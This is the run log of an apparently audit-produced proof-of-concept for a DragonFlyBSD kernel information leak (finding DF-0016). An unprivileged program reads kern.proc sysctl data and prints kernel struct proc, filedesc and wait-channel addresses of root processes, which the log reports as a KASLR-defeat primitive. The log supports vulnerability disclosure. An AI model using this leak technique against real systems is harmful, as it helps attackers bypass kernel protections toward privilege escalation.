DragonFlyBSD Kernel Audit
DF-0016 / run.log
← back to finding ↓ download raw
running as uid=1001 (./leak_kinfo); self pid=1843
reading kern.proc.pid.<pid> (KERN_PROC_PID -> PRISON_CHECK only, no p_trespass gate)

  pid 1843   uid=1001 comm=leak_kinfo      
      kp_paddr   = 0xfffff80066808280  (struct proc slab)
      kp_fd      = 0xfffff80066848940  (filedesc slab)
      kl_wchan   = 0x0000000000000000  
      kp_ktaddr  = 0x0000000000000000  
  pid 1      uid=0    comm=init            
      kp_paddr   = 0xfffff80066807880  (struct proc slab)
      kp_fd      = 0xfffff80066840ec0  (filedesc slab)
      kl_wchan   = 0xfffff80066807880  (wait channel)
      kp_ktaddr  = 0x0000000000000000  
  pid 68     uid=0    comm=hammer2         
      kp_paddr   = 0xfffff800ab143280  (struct proc slab)
      kp_fd      = 0xfffff800ab163c40  (filedesc slab)
      kl_wchan   = 0xfffff80065c799f8  (wait channel)
      kp_ktaddr  = 0x0000000000000000  
  pid 285    uid=0    comm=dhclient        
      kp_paddr   = 0xfffff8006680c880  (struct proc slab)
      kp_fd      = 0xfffff8006684c140  (filedesc slab)
      kl_wchan   = 0xfffff8006680c880  (wait channel)
      kp_ktaddr  = 0x0000000000000000  
  pid 328    uid=0    comm=devd            
      kp_paddr   = 0xfffff800ab144180  (struct proc slab)
      kp_fd      = 0xfffff800ab1669c0  (filedesc slab)
      kl_wchan   = 0xfffff80067a5dff8  (wait channel)
      kp_ktaddr  = 0x0000000000000000  
  pid 411    uid=0    comm=syslogd         
      kp_paddr   = 0xfffff800ab145080  (struct proc slab)
      kp_fd      = 0xfffff800ab167b40  (filedesc slab)
      kl_wchan   = 0xfffff80067a5e778  (wait channel)
      kp_ktaddr  = 0x0000000000000000  
  pid 699    uid=0    comm=sshd            
      kp_paddr   = 0xfffff800ab144b80  (struct proc slab)
      kp_fd      = 0xfffff800ab1677c0  (filedesc slab)
      kl_wchan   = 0xfffff80067a5e4f8  (wait channel)
      kp_ktaddr  = 0x0000000000000000  
  pid 730    uid=0    comm=cron            
      kp_paddr   = 0xfffff800ab144680  (struct proc slab)
      kp_fd      = 0xfffff800ab16a540  (filedesc slab)
      kl_wchan   = 0xffffffff8130f670  (wait channel)
      kp_ktaddr  = 0x0000000000000000  

=== stability check: read pid 1 three times, kp_paddr must match ===
  pid 1 kp_paddr: 0xfffff80066807880 / 0xfffff80066807880 / 0xfffff80066807880  (STABLE = real struct proc address)

result: 24 kernel pointers leaked across 8 processes
result: LEAK CONFIRMED (KASLR-defeat / slab-address primitive)
RUN_EXIT=0